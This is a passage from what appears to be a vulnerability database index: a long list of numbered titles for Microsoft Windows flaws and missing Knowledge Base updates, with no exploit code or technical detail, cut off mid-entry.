Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61498] Microsoft Windows RPC code execution [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial 